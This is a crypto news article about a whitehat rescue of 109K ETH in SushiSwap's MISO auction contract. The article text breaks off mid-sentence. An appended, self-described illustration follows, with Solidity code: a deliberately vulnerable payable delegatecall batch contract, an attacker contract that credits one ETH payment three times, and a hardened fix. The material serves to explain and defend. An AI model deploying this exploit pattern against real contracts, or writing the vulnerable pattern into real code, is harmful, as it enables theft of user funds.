NewsBTC 2021-08-17 22:04:51

How A Whitehat Hacker Saved 109K ETH On SushiSwap-Based Contract

White hat hacker samczsun of the investment firm Paradigm has reported what may be one of the largest rescues ever carried out on the SushiSwap protocol, in the Ethereum ecosystem, and perhaps anywhere on the internet.

"Just pulled off maybe the biggest whitehat rescue ever. Story time soon 🔥" — samczsun (@samczsun) August 17, 2021

In a post, samczsun said he found and helped patch a vulnerability that put over $350 million, about 109,000 ETH, at risk in a SushiSwap-based contract on its MISO platform. He reviewed the contract after noticing that a new auction was running on the platform. MISO supports two auction types, Dutch and batch. While reviewing the DutchAuction contract, samczsun found that the initMarket and initAuction functions lacked access controls, which he called “extremely concerning”.

"I didn’t really expect this to be a vulnerability though, since I didn’t expect the Sushi team to make such an obvious misstep. Sure enough, the initAccessControls function validated that the contract had not already been initialized."

samczsun said that this, combined with the contract's use of a mixin library called BoringBatchable, made him more suspicious: he recognized the same ingredients that led to an attack on another platform in 2020, and concluded that SushiSwap was in danger. If exploited, the vulnerability would allow a bad actor to reuse a fixed amount of ETH to batch m...
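The ingredient the story points to, a batching helper that forwards several calls to the contract itself with delegatecall so that a single ETH payment is seen by every batched call, is shown below as an added illustration written for this article. It is not code from MISO, SushiSwap or the BoringBatchable library; the contract and function names (VulnerableBatchable, HardenedBatchable, Attacker, commitEth, batch, solvent) and the three-call attack sequence are hypothetical, chosen only to make the ETH double counting visible.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added illustration (not MISO/BoringBatchable code). All names are hypothetical.

// Auction-style contract that credits ETH commitments and exposes a
// delegatecall-based batch helper in the style of a batching mixin.
contract VulnerableBatchable {
    mapping(address => uint256) public committed;
    uint256 public totalCommitted;

    // Records msg.value as a commitment. Called directly, this is fine:
    // the ETH credited is the ETH that actually arrived.
    function commitEth() public payable {
        committed[msg.sender] += msg.value;
        totalCommitted += msg.value;
    }

    // Weak: a payable batch. delegatecall preserves msg.value, so every call
    // in `calls` observes the same msg.value although ETH was sent only once.
    function batch(bytes[] calldata calls) external payable {
        for (uint256 i = 0; i < calls.length; i++) {
            (bool ok, ) = address(this).delegatecall(calls[i]);
            require(ok, "batched call failed");
        }
    }
}

// Constructed attack: one payment of msg.value, three credits of it.
// After drainSetup{value: 1 ether}, committed[attacker] == 3 ether while the
// target's balance rose by only 1 ether, so totalCommitted > address(this).balance.
contract Attacker {
    function drainSetup(VulnerableBatchable target) external payable {
        bytes[] memory calls = new bytes[](3);
        for (uint256 i = 0; i < calls.length; i++) {
            calls[i] = abi.encodeWithSelector(target.commitEth.selector);
        }
        // ETH is forwarded exactly once; each delegatecall'd commitEth still
        // reads msg.value == 1 ether. The attacker is msg.sender throughout
        // because delegatecall keeps the original caller.
        target.batch{value: msg.value}(calls);
    }
}

// Hardened variant: the batch entry point refuses ETH, so msg.value is zero
// for the outer call and therefore zero inside every delegatecall'd function.
contract HardenedBatchable {
    mapping(address => uint256) public committed;
    uint256 public totalCommitted;

    function commitEth() public payable {
        committed[msg.sender] += msg.value;
        totalCommitted += msg.value;
    }

    // Fix: non-payable. A batched commitEth now credits nothing instead of
    // crediting the same ETH repeatedly. Any batched operation that needs ETH
    // must take an explicit amount drawn from a balance funded beforehand.
    function batch(bytes[] calldata calls) external {
        for (uint256 i = 0; i < calls.length; i++) {
            (bool ok, ) = address(this).delegatecall(calls[i]);
            require(ok, "batched call failed");
        }
    }

    // Defense in depth: reconcile accounting against real holdings. If
    // totalCommitted ever exceeds the ETH actually held, msg.value has been
    // counted more than once somewhere and withdrawals will not be covered.
    function solvent() external view returns (bool) {
        return address(this).balance >= totalCommitted;
    }
}
```

The check a reviewer wants when auditing any batching or multicall helper is the combination on the vulnerable side: the entry point is payable, it dispatches with delegatecall, and at least one reachable function trusts msg.value. Removing any one of the three closes the double counting; making the batch entry point non-payable is the smallest change and the one shown here.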
